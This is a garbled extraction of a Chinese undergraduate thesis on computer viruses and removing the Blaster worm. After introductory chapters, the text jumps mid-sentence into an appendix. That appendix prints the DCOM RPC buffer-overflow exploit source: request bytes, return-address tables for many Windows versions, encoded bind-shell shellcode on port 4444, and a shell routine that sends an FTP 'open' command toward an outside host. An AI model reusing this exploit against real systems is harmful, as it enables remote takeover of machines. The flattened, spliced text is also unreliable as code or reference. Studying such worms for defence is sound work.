毕业设计（论文)-计算机病毒诊断与防治(附源程序）.doc

河北理工大学毕业设计说明书 第 1 页 共 83 页 目 录 引 言 1 第一章 计算机病毒简介 2 1 1 计算机病毒的认识 2 1 1 1 计算机病毒的产生 2 1 1 2 计算机病毒的起源识 4 1 2 计算机病毒的结构特征 4 1 2 1 病毒的结构 4 1 2 2 病毒的特征 5 1 3 计算机病毒的发展历史 6 1 4 蠕虫病毒 6 1 5 计算机病毒发展趋势 10 第二章 冲击波病毒简述 11 2 1 冲击波病毒介绍 11 2 2 冲击波病毒的操作与症状 11 2 2 1 冲击波病毒的操作 11 2 2 2 计算机病毒的发作症状 12 2 3 冲击波病毒的具体说明 13 2 4 冲击波病毒的解决方案 14 2 4 1 应急解决 14 2 4 2 DOS 下清除该病毒 15 2 4 3 安全模式下清楚该病毒 15 2 4 4 安全建议 17 第三章 VB 介绍 18 3 1 VB 的诞生 18 3 2 VB 的特性 18 3 3 VB 中的 API 函数 19 河北理工大学毕业设计说明书 第 2 页 共 83 页 3 3 1 什么是 API 函数 19 3 3 2 软件中涉及的 API 函数及其定义 20 第四章 冲击波的杀毒软件 23 4 1 杀毒软件介绍 23 4 2 杀毒软件具体实现 25 4 3 杀毒软件流程图 29 第五章 设计总结 30 致谢 36 参考文献 37 附录 38 河北理工大学毕业设计说明书 第 3 页 共 83 页 摘摘 要要 目前 计算机病毒可以渗透信息社会的各个领域 给计算机系统带来了巨大的破坏和 潜在的威胁 为了确保信息的安全与畅通 因此研究对算机病毒的分析与清除的方法是迫 在眉睫的 本论文从对病毒的分析入手 结合计算机病毒传染的现状 概述了计算机病毒 的发展历史及危害性 给出计算机病毒的一种计算模型 并针对具体的实例 冲击波病毒 初步分析其有关性质和作用原理 仔细阅读它的源程序 根据病毒的发作机制 提出了它 的清除方式 冲击波病毒主要是利用微软系统的漏洞 实现其破坏目的的 我主要是采用对所有的 文件进行二进制扫描 如果发现病毒特征码就认为是病毒感染文件 保留文件的路径后 根据路径删除感染文件 同时清楚注册表中被病毒改写过的内容 从而最终实现其杀毒的 目的 关键词 病毒 冲击波 二进制 路径 注册表 全套源程序代码 联系全套源程序代码 联系 153893706153893706 河北理工大学毕业设计说明书 第 4 页 共 83 页 AbstractAbstract At present computer virus could permeate every region of the society And it brings great destruction and potential threat to the computer system In order to insure the safety and expedite of the information so study the analysis which is computer virus and the method which is used to clear away the virus is pressing This paper generalizes the development and the harm of the computer virus by analyzing the actuality of the computer virus and beginning with analysis of the computer virus We also get a compute model of the computer virus our model is more practical and reasonable in respect of the computer virus characters of infection and spread According a in detail example that is Worm Blaster preliminarily analyze the character and action principle about the Worm Blaster carefully read its source program according to the outbreak mechanism of the virus bring forward its way which is used to clear way Worm Blaster accomplishes destructive aim by using the leak of Microsoft system We mainly use binary scanning which is used for all files If finding out characteristic we will consider that it is the file that is infected by computer virus After conserving the path which is infected file according this path delete this file At the same time clear off the content of the register which is recomposed by computer virus Thereby we finally accomplish the aim which is clear off virus Keywords virus Worm Blaster binary path register 河北理工大学毕业设计说明书 第 5 页 共 83 页 引 言 随着计算机在社会生活各个领域的广泛运用 计算机病毒攻击与防范技术 也在不断拓展 据报道 世界各国遭受计算机病毒感染和攻击的事件数以亿计 严重地干扰了正常的人类社会生活 给计算机网络和系统带来了巨大的潜在威 胁和破坏 与此同时 病毒技术在战争领域也曾广泛的运用 在海湾战争 近 期的科索沃战争中 双方都曾利用计算机病毒向敌方发起攻击 破坏对方的计 算机网络和武器控制系统 达到了一定的政治目的与军事目的 可以预见 随 着计算机 网络运用的不断普及 深入 防范计算机病毒越来越受到各国的高 度重视 在科技年鉴记载的种种丰功伟绩当中 在科技年鉴记载的种种丰功伟业当 中 Fred Cohen 的贡献绝对堪称一绝 是他把 病毒 virus 一词引进电脑 词典 在 1984 年发表的研究论文中 这位 New Haven 大学教授首度使用 病 毒 一词 用来形容会自我扩散的程序及其带来的威胁 并建议可能的防御之 道 21 世纪全世界的计算机都将通过 Internet 联到一起 这是一个信息的社 会 网络的社会 信息安全的内涵也就发生了根本的变化 它不仅从一般性的 防卫变成了一种非常普通的防范 而且还从一种专门的领域变成了无处不在 计算机病毒是能改变或破坏存在计算机中的数据的程序 而且它能在操作 过程中不断自我复制 从而造成损害 1987 年 计算机病毒在美国四处蔓延 而且第一种计算机病毒 小球 在当年年底传播到我国 从那以后 已经发现 进口和国内的病毒 迄今为止 计算机病毒已经增加到 20 000 多种 其中 90 以上能攻击微型计算机 在本次设计中 我主要是选择了冲击波病毒作为研究的课题 通过对冲击 波的有关性质和作用原理进行系统的分析 找到它的发作机制 提出了一套事 实可行的解决方案 主要是采用对所有的文件进行二进制扫描 如果发现病毒 特征码就认为是病毒感染文件 保留文件的路径后 根据路径删除感染文件 同时清楚注册表中被病毒改写过的内容 河北理工大学毕业设计说明书 第 6 页 共 83 页 第一章 计算机病毒的简介 1 1 计算机病毒的认识 什么是计算机病毒 怎样预防及消灭病毒 关于这个话题 众说纷纭 有 人说 只要拥有了一套功能强大的杀毒软件便万事大吉 有人说 只要不上网 就可抗拒病毒的侵害 还有人认为 只要定期格式化硬盘就能把病毒扼制在萌 芽状态 面对种种说法 其实病毒不是那么神奇 对它的预防与剿灭也远不 是如此简单 计算机病毒 computer virus 最早是由美国计算机病毒研究专家 F Conhen 博士提出 病毒 是指能够破坏计算机系统 影响计算机工作并能实现自我复制的一 段程序或指令代码 它有着与生物病毒极为相似的特点 一是寄生性 它们大 多依附在别的程序上面 二是隐蔽性 它们是悄然进入系统的 人们很难察觉 三是潜伏性 它们通常是潜伏在计算机程序中 只在一定条件下才发作的 四 是传染性 它们能够自我复制繁殖 通过传输媒介蔓延 五是破坏性 轻则占 用一定数量的系统资源 重则破坏整个系统 随着计算机工业的发展 病毒程序层出不穷 到了 21 世纪的今天它的种类 已经达到千万种 虽然病毒的类型有很多 变型的病毒更无法计算 但是就其 传染对象来分只不过四类 BIOS 硬盘引导区 操作系统与应用程序病毒 1 1 1 计算机病毒的产生 计算机病毒的产生是计算机技术和以计算机为核心的社会信息化进程发展 到一定阶段的必然产物 它产生的背景是 1 计算机病毒是计算机犯罪的一种新的衍化形式 计算机病毒是高技术犯罪 具有瞬时性 动态性和随机性 不易取证 风 险小破坏大 从而刺激了犯罪意识和犯罪活动 是某些人恶作剧和报复心态在 计算机应用领域的表现 河北理工大学毕业设计说明书 第 7 页 共 83 页 2 计算机软硬件产品的危弱性是根本的技术原因 计算机是电子产品 数据从输入 存储 处理 输出等环节 易误入 篡 改 丢失 作假和破坏 程序易被删除 改写 计算机软件设计的手工方式 效 率低下且生产周期长 人们至今没有办法事先了解一个程序有没有错误 只能 在运行中发现 修改错误 并不知道还有多少错误和缺陷隐藏在其中 这些脆 弱性就为病毒的侵入提供了方便 3 微机的普及应用是计算机病毒产生的必要环境 1983 年 11 月 3 日美国计算机专家首次提出了计算机病毒的概念并进行了 验证 几年前计算机病毒就迅速蔓延 到我国才是近年来的事 而这几年正是我 国微型计算机普及应用热潮 微机的广泛普及 操作系统简单明了 软 硬件 透明度高 基本上没有什么安全措施 能够透彻了解它内部结构的用户日益增多 对其存在的缺点和易攻击处也了解的越来越清楚 不同的目的可以做出截然不 同的选择 目前 在 IBMPC 系统及其兼容机上广泛流行着各种病毒就很说明这 个问题 其产生原因也不外乎以下几种 1 一些计算机爱好者出于好奇或者兴趣 也有的是为了满足自己的表现 欲 故意编制出一些特殊的计算机程序 以显示自己的才干 次类病 毒破坏性一般不大 2 产生于个别人的报复心理 此种病毒对电脑用户会造成一定的灾难 3 来源于软件加密 一些商业软件公司为了不让自己的软件被非法复制 和使用 运用加密技术 编写一些特殊程序附加在正版软件上 如遇 到非法使用 则此类程序自动激活 于是又会产生新的病毒 如巴基 斯坦病毒 4 用于研究或实验而设计的 有用 的程序 由于某种原因失去控制而 扩散出来 5 由于政治 经济和军事等特殊目的 一些组织或个人也会编写一些程 序用于进攻对方的电脑 给对法官造成灾难或者直接经济损失 其感染的途径主要有 1 引进的计算机系统和软件中带有病毒 河北理工大学毕业设计说明书 第 8 页 共 83 页 2 各类出国人员带回的计算机和软件染有病毒 3 染有病毒的游戏软件 4 非法拷贝病毒 5 计算机生产 经营单位销售的计算机和软件染有病毒 6 维修部门交叉感染 7 有人研制 改造病毒 8 敌对分子以病毒为媒体或武器进行宣传和破坏 9 通过互联网 访问 Web 下载 E Mail 和文件等 传入的 1 1 2 计算机病毒的起源 计算机病毒并非是最近才出现的新产物 事实上 早在 1949 年 距离第一 部商用电脑的出现仍有好几年 电脑的先驱者冯 诺伊曼 John Von Neumann 在他所提出的一篇论问 复杂自动装置的理论及组织的进行 中勾勒出了病程 序的蓝图 他指出 数据和程序并无本质的区别 十年后 在美国电话电报公 司 AT unsigned char request1 0 x05 0 x00 0 x00 0 x03 0 x10 0 x00 0 x00 0 x00 0 xE8 0 x03 0 x00 0 x00 0 xE5 0 x00 0 x00 0 x00 0 xD0 0 x03 0 x00 0 x00 0 x01 0 x00 0 x04 0 x0 0 0 x05 0 x00 0 x06 0 x00 0 x01 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x32 0 x24 0 x58 0 xF D 0 xCC 0 x45 0 x64 0 x49 0 xB0 0 x70 0 xDD 0 xAE 0 x74 0 x2C 0 x96 0 xD2 0 x60 0 x5E 0 x0D 0 x0 0 0 x01 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x70 0 x5E 0 x0D 0 x00 0 x02 0 x00 0 x00 0 x0 0 0 x7C 0 x5E 河北理工大学毕业设计说明书 第 45 页 共 83 页 0 x0D 0 x00 0 x00 0 x00 0 x00 0 x00 0 x10 0 x00 0 x00 0 x00 0 x80 0 x96 0 xF1 0 xF 1 0 x2A 0 x4D 0 xCE 0 x11 0 xA6 0 x6A 0 x00 0 x20 0 xAF 0 x6E 0 x72 0 xF4 0 x0C 0 x00 0 x00 0 x0 0 0 x4D 0 x41 0 x52 0 x42 0 x01 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0D 0 xF0 0 xAD 0 xB A 0 x00 0 x00 0 x00 0 x00 0 xA8 0 xF4 0 x0B 0 x00 0 x60 0 x03 0 x00 0 x00 0 x60 0 x03 0 x00 0 x0 0 0 x4D 0 x45 0 x4F 0 x57 0 x04 0 x00 0 x00 0 x00 0 xA2 0 x01 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x46 0 x38 0 x03 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x46 0 x00 0 x00 0 x00 0 x00 0 x30 0 x03 0 x00 0 x0 0 0 x28 0 x03 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x01 0 x10 0 x08 0 x00 0 xCC 0 xCC 0 xCC 0 xC C 0 xC8 0 x00 0 x00 0 x00 0 x4D 0 x45 0 x4F 0 x57 0 x28 0 x03 0 x00 0 x00 0 xD8 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x02 0 x00 0 x00 0 x00 0 x07 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 xC4 0 x28 0 xCD 0 x0 0 0 x64 0 x29 0 xCD 0 x00 0 x00 0 x00 0 x00 0 x00 0 x07 0 x00 0 x00 0 x00 0 xB9 0 x01 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x46 0 xAB 0 x01 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x46 0 xA5 0 x01 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x46 0 xA6 0 x01 0 x00 0 x0 河北理工大学毕业设计说明书 第 46 页 共 83 页 0 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x46 0 xA4 0 x01 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x46 0 xAD 0 x01 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x46 0 xAA 0 x01 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x46 0 x07 0 x00 0 x00 0 x0 0 0 x60 0 x00 0 x00 0 x00 0 x58 0 x00 0 x00 0 x00 0 x90 0 x00 0 x00 0 x00 0 x40 0 x00 0 x00 0 x0 0 0 x20 0 x00 0 x00 0 x00 0 x78 0 x00 0 x00 0 x00 0 x30 0 x00 0 x00 0 x00 0 x01 0 x00 0 x00 0 x0 0 0 x01 0 x10 0 x08 0 x00 0 xCC 0 xCC 0 xCC 0 xCC 0 x50 0 x00 0 x00 0 x00 0 x4F 0 xB6 0 x88 0 x2 0 0 xFF 0 xFF 0 xFF 0 xFF 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x01 0 x10 0 x08 0 x00 0 xCC 0 xCC 0 xCC 0 xCC 0 x48 0 x00 0 x00 0 x00 0 x07 0 x00 0 x66 0 x0 0 0 x06 0 x09 0 x02 0 x00 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x4 6 0 x10 0 x00 河北理工大学毕业设计说明书 第 47 页 共 83 页 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x01 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x78 0 x19 0 x0C 0 x00 0 x58 0 x00 0 x00 0 x00 0 x05 0 x00 0 x06 0 x0 0 0 x01 0 x00 0 x00 0 x00 0 x70 0 xD8 0 x98 0 x93 0 x98 0 x4F 0 xD2 0 x11 0 xA9 0 x3D 0 xBE 0 x5 7 0 xB2 0 x00 0 x00 0 x00 0 x32 0 x00 0 x31 0 x00 0 x01 0 x10 0 x08 0 x00 0 xCC 0 xCC 0 xCC 0 xC C 0 x80 0 x00 0 x00 0 x00 0 x0D 0 xF0 0 xAD 0 xBA 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x18 0 x43 0 x14 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x60 0 x00 0 x00 0 x00 0 x60 0 x00 0 x00 0 x00 0 x4D 0 x45 0 x4F 0 x57 0 x04 0 x00 0 x00 0 x0 0 0 xC0 0 x01 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x4 6 0 x3B 0 x03 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 xC0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x4 6 0 x00 0 x00 0 x00 0 x00 0 x30 0 x00 0 x00 0 x00 0 x01 0 x00 0 x01 0 x00 0 x81 0 xC5 0 x17 0 x0 3 0 x80 0 x0E 0 xE9 0 x4A 0 x99 0 x99 0 xF1 0 x8A 0 x50 0 x6F 0 x7A 0 x85 0 x02 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x01 0 x00 0 x00 0 x00 0 x01 0 x10 0 x08 0 x00 0 xCC 0 xCC 0 xCC 0 xC C 0 x30 0 x00 0 x00 0 x00 0 x78 0 x00 0 x6E 0 x00 0 x00 0 x00 0 x00 0 x00 0 xD8 0 xDA 0 x0D 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x20 0 x2F 0 x0C 0 x00 0 x00 0 x00 0 x00 0 x0 河北理工大学毕业设计说明书 第 48 页 共 83 页 0 0 x00 0 x00 0 x00 0 x00 0 x03 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x03 0 x00 0 x00 0 x0 0 0 x46 0 x00 0 x58 0 x00 0 x00 0 x00 0 x00 0 x00 0 x01 0 x10 0 x08 0 x00 0 xCC 0 xCC 0 xCC 0 xC C 0 x10 0 x00 0 x00 0 x00 0 x30 0 x00 0 x2E 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x01 0 x10 0 x08 0 x00 0 xCC 0 xCC 0 xCC 0 xC C 0 x68 0 x00 0 x00 0 x00 0 x0E 0 x00 0 xFF 0 xFF 0 x68 0 x8B 0 x0B 0 x00 0 x02 0 x00 0 x00 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 unsigned char request2 0 x20 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x20 0 x00 0 x00 0 x00 0 x5C 0 x00 0 x5C 0 x00 unsigned char request3 0 x5C 0 x00 0 x43 0 x00 0 x24 0 x00 0 x5C 0 x00 0 x31 0 x00 0 x32 0 x00 0 x33 0 x00 0 x34 0 x0 0 0 x35 0 x00 0 x36 0 x00 0 x31 0 x00 0 x31 0 x00 0 x31 0 x00 0 x31 0 x00 0 x31 0 x00 0 x31 0 x0 0 0 x31 0 x00 0 x31 0 x00 0 x31 0 x00 0 x31 0 x00 0 x31 0 x00 0 x31 0 x00 0 x31 0 x00 0 x31 0 x0 0 0 x31 0 x00 0 x2E 0 x00 0 x64 0 x00 0 x6F 0 x00 0 x63 0 x00 0 x00 0 x00 unsigned char targets 河北理工大学毕业设计说明书 第 49 页 共 83 页 Windows NT SP4 english Windows NT SP5 chineese Windows NT SP6 chineese Windows NT SP6a chineese Windows 2000 NOSP polish Windows 2000 SP3 polish Windows 2000 SP4 spanish Windows 2000 NOSP1 english Windows 2000 NOSP2 english Windows 2000 SP2 1 english Windows 2000 SP2 2 english Windows 2000 SP3 2 english Windows 2000 NOSP chineese Windows 2000 SP1 chineese Windows 2000 SP2 chineese Windows 2000 SP3 chineese Windows 2000 SP4 chineese Windows 2000 SP3 german Windows 2000 NOSP japaneese Windows 2000 SP1 japaneese Windows 2000 SP2 japaneese Windows 2000 NOSP korean Windows 2000 SP1 korean Windows 2000 SP2 korean Windows 2000 NOSP mexican Windows 2000 SP1 mexican Windows XP NOSP english Windows SP1 2 english Windows 2k3 english 河北理工大学毕业设计说明书 第 50 页 共 83 页 Windows 2000 SP3 german Windows 2000 SP4 1 german Windows 2000 SP4 2 german Windows XP SP1 german Windows 2000 SERVER SP1 french Windows 2000 SERVER SP4 french Windows XP NOSP french Windows XP SP1 french Windows 2000 SP0 english Windows 2000 SP1 english Windows 2000 SP2 english Windows 2000 SP3 english Windows 2000 SP4 english Windows XP SP0 english Windows XP SP1 1 english Windows XP SP2 english Windows 2000 Advanced Server SP3 english ALL WINXP WIN2K NULL unsigned long offsets 0 x77e527f3 0 x77cfdaee 0 x77ac0ef0 0 x77c3eaf0 0 x774d3fe3 0 x77292ce4 河北理工大学毕业设计说明书 第 51 页 共 83 页 0 x77133ba5 0 x777416e8 0 x772b49e2 0 x77b524e8 0 x775cfa2e 0 x772ae3e2 0 x778b89e6 0 x772b49e0 0 x77444342 0 x77294cdf 0 x777a882e 0 x77e527f3 0 x778b89e5 0 x772b49df 0 x772ae3e1 0 x778b89e5 0 x772b49df 0 x772ae3e1 0 x778b89e8 0 x77e3afe9 0 x77db37d7 0 x77b05422 0 x77292ce3 0 x77294ce0 0 x7756c2e2 0 x77fc18d4 0 x774b3ee4 0 x7756c2e2 0 x774a75d4 河北理工大学毕业设计说明书 第 52 页 共 83 页 0 x77fc18d4 0 x77e81674 0 x77e829ec 0 x77e824b5 0 x77e8367a 0 x77f92a9b 0 x77e9afe3 0 x77e626ba 0 x77d737db 0 x77e2afc5 0 x010016C6 unsigned char sc x46 x00 x58 x00 x4E x00 x42 x00 x46 x00 x58 x00 x46 x00 x58 x00 x4E x00 x42 x00 x46 x00 x58 x00 x46 x00 x58 x00 x46 x00 x58 x00 x46 x00 x58 x00 xff xff xff xff return address xcc xe0 xfd x7f primary thread data block xcc xe0 xfd x7f primary thread data block port 4444 bindshell x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 河北理工大学毕业设计说明书 第 53 页 共 83 页 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 xeb x19 x5e x31 xc9 x81 xe9 x89 xff xff xff x81 x36 x80 xbf x32 x94 x81 xee xfc xff xff xff xe2 xf2 xeb x05 xe8 xe2 xff xff xff x03 x53 x06 x1f x74 x57 x75 x95 x80 xbf xbb x92 x7f x89 x5a x1a xce xb1 xde x7c xe1 xbe x32 x94 x09 xf9 x3a x6b xb6 xd7 x9f x4d x85 x71 xda xc6 x81 xbf x32 x1d xc6 xb3 x5a xf8 xec xbf x32 xfc xb3 x8d x1c xf0 xe8 xc8 x41 xa6 xdf xeb xcd xc2 x88 x36 x74 x90 x7f x89 x5a xe6 x7e x0c x24 x7c xad xbe x32 x94 x09 xf9 x22 x6b xb6 xd7 x4c x4c x62 xcc xda x8a x81 xbf x32 x1d xc6 xab xcd xe2 x84 xd7 xf9 x79 x7c x84 xda x9a x81 xbf x32 x1d xc6 xa7 xcd xe2 x84 xd7 xeb x9d x75 x12 xda x6a x80 xbf x32 x1d xc6 xa3 xcd xe2 x84 xd7 x96 x8e xf0 x78 xda x7a x80 xbf x32 x1d xc6 x9f xcd xe2 x84 xd7 x96 x39 xae x56 xda x4a x80 xbf x32 x1d xc6 x9b xcd xe2 x84 xd7 xd7 xdd x06 xf6 xda x5a x80 xbf x32 x1d xc6 x97 xcd xe2 x84 xd7 xd5 xed x46 xc6 xda x2a x80 xbf x32 x1d xc6 x93 x01 x6b x01 x53 xa2 x95 x80 xbf x66 xfc x81 xbe x32 x94 x7f xe9 x2a xc4 xd0 xef x62 xd4 xd0 xff x62 x6b xd6 xa3 xb9 x4c xd7 xe8 x5a x96 x80 xae x6e x1f x4c xd5 x24 xc5 xd3 x40 x64 xb4 xd7 xec xcd xc2 xa4 xe8 x63 xc7 x7f xe9 x1a x1f x50 xd7 x57 xec xe5 xbf x5a xf7 xed xdb x1c x1d xe6 x8f xb1 x78 xd4 x32 x0e xb0 xb3 x7f x01 x5d x03 x7e x27 x3f x62 x42 xf4 xd0 xa4 xaf x76 x6a xc4 x9b x0f x1d xd4 x9b x7a x1d xd4 x9b x7e x1d xd4 x9b x62 x19 xc4 x9b x22 xc0 xd0 xee x63 xc5 xea xbe x63 xc5 x7f xc9 x02 xc5 x7f xe9 x22 x1f x4c xd5 xcd x6b xb1 x40 x64 x98 x0b x77 x65 x6b xd6 x93 xcd xc2 x94 xea x64 xf0 x21 x8f x32 x94 x80 x3a xf2 xec x8c x34 x72 x98 x0b xcf x2e x39 x0b xd7 x3a x7f x89 x34 x72 xa0 x0b x17 x8a x94 x80 xbf xb9 x51 xde xe2 xf0 x90 x80 河北理工大学毕业设计说明书 第 54 页 共 83 页 xec x67 xc2 xd7 x34 x5e xb0 x98 x34 x77 xa8 x0b xeb x37 xec x83 x6a xb9 xde x98 x34 x68 xb4 x83 x62 xd1 xa6 xc9 x34 x06 x1f x83 x4a x01 x6b x7c x8c xf2 x38 xba x7b x46 x93 x41 x70 x3f x97 x78 x54 xc0 xaf xfc x9b x26 xe1 x61 x34 x68 xb0 x83 x62 x54 x1f x8c xf4 xb9 xce x9c xbc xef x1f x84 x34 x31 x51 x6b xbd x01 x54 x0b x6a x6d xca xdd xe4 xf0 x90 x80 x2f xa2 x04 unsigned char request4 0 x01 0 x10 0 x08 0 x00 0 xCC 0 xCC 0 xCC 0 xCC 0 x20 0 x00 0 x00 0 x00 0 x30 0 x00 0 x2D 0 x0 0 0 x00 0 x00 0 x00 0 x00 0 x88 0 x2A 0 x0C 0 x00 0 x02 0 x00 0 x00 0 x00 0 x01 0 x00 0 x00 0 x0 0 0 x28 0 x8C 0 x0C 0 x00 0 x01 0 x00 0 x00 0 x00 0 x07 0 x00 0 x00 0 x00 0 x00 0 x00 0 x00 0 x0 0 void shell int sock fd set fd read char buff 1024 cmd echo open coke13 ddo jp o int n 河北理工大学毕业设计说明书 第 55 页 共 83 页 FD ZERO FD SET sock FD SET 0 send sock cmd strlen cmd 0 while 1 FD SET sock FD SET 0 if select FD SETSIZE if FD ISSET sock exit 2 if write 1 buff n 0 break if FD ISSET 0 exit 2 if send sock buff n 0 0 break 河北理工大学毕业设计说明书 第 56 页 共 83 页 usleep 10 exit 0 fprintf stderr Connection lost n n exit 0 int main int argc char argv int sock int len len1 unsigned int target id unsigned long ret struct sockaddr in target ip unsigned short port 135 unsigned char buf1 0 x1000 unsigned char buf2 0 x1000 printf n printf Remote DCOM RPC Buffer Overflow Exploit n printf Original code by FlashSky and Benjurry n printf Rewritten by HDM n printf autoroot worm by volkam n printf Fixed and Beefed by Legion2000 Security Research n if argc 3 printf Usage s n argv 0 河北理工大学毕业设计说明书 第 57 页 共 83 页 printf Targets n for len 0 targets len NULL len printf d t s n len targets len printf n exit 1 yeah get over it target id atoi argv 1 ret offsets target id printf Using return address of 0 x 8x n ret memcpy sc 36 unsigned char target ip sin family AF INET target ip sin addr s addr inet addr argv 2 target ip sin port htons port if sock socket AF INET SOCK STREAM 0 1 perror Socket return 0 if connect sock struct sockaddr 河北理工大学毕业设计说明书 第 58 页 共 83 页 return 0 len sizeof sc memcpy buf2 request1 sizeof request1 len1 sizeof request1 unsigned long request2 unsigned long request2 sizeof sc 2 unsigned long request2 8 unsigned long request2 8 sizeof sc 2 memcpy buf2 len1 request2 sizeof request2 len1 len1 sizeof request2 memcpy buf2 len1 sc sizeof sc len1 len1